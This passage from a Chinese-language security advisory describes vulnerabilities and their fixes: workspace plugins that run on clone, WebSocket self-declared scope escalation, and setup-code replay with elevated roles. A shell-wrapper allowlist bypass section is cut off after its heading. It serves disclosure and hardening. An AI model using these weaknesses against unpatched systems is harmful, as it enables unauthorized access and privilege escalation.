1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复后（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22-beta.1</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）：workspace origin 被单独拉出来做 deny-by-default，只有显式允许或明确启用时才会装载执行。</span></p><p data-line="97" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复效果</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：工作区插件从&#34;默认启用&#34;改为&#34;默认禁用&#34;，彻底切断&#34;克隆即执行&#34;的攻击链。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="101" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.2 WebSocket 权限提升：共享 Token 自声明 Scope</span></h3><p data-line="103" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：严重  </span></p><p data-line="103" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">影响版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：version &lt;= </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.13</span></code></p><p data-line="106" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：攻击者持有一个低权限的共享 token，在建立 WebSocket 连接时，在连接参数中自行声明 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">operator</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 级别的 scope。旧版本在 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">sharedAuthOk</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 为真时不会清除这些自声明的 scope，攻击者因此获得超出其实际权限的操作能力。</span></p><p data-line="108" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">技术根因</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/gateway/server/ws-connection/message-handler.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）</span></p><p data-line="110" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">漏洞前态：只要 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">sharedAuthOk</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 为真，客户端自声明的 scopes 就可能被保留，</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">clearUnboundScopes</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 函数在此条件下不执行清除。</span></p><p data-line="112" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复后：scope 保留变成显式 allow path——</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">clearUnboundScopes</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 无条件清空 scopes，仅在设备身份明确且鉴权决策为 allow 时才通过独立条件分支保留，无设备身份时一律清除。</span></p><p data-line="114" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复效果</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：在无设备身份场景下，scope 保留变成显式 allow path，而不是 shared auth 默认保留。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="118" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.3 Setup Code 重放与权限放大</span></h3><p data-line="120" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：严重  </span></p><p data-line="120" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">影响版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：version &lt;= </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.13</span></code></p><p data-line="123" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：攻击者截获或猜测到一个设备配对 setup code，在审批完成前多次重放该 code，并在重放时声明比原始签发时更高的 role/scope，从而获得超出预期的设备权限。旧版本的 setup code 可被多次消费，且不校验 role/scope 是否与签发时一致。</span></p><p data-line="125" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">技术根因</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/infra/device-bootstrap.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）</span></p><p data-line="127" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复后（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22-beta.1</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）引入了两层保护：将兑换时请求的 role/scope profile 与签发时持久化的 profile 做严格比对，不一致则直接拒绝；校验通过后在返回成功前立即删除 token 记录，确保一次性消费。</span></p><p data-line="129" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复效果</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：</span></p><ul style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: disc;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">权限绑定</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：兑换时必须与签发时的 role/scope profile 完全一致，无法在兑换时升级权限。</span></p></li><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">一次性消费</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：成功前即删除记录，阻止重放与审批前放权。</span></p></li></ul><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="135" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.4 Shell Wrapper Allowlist 绕过</span></h3><p data-line="137" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：高危  </span></p><p data-line="137" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">影响版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：version &lt;= </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.22</span></code></p><p data-line="140" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: 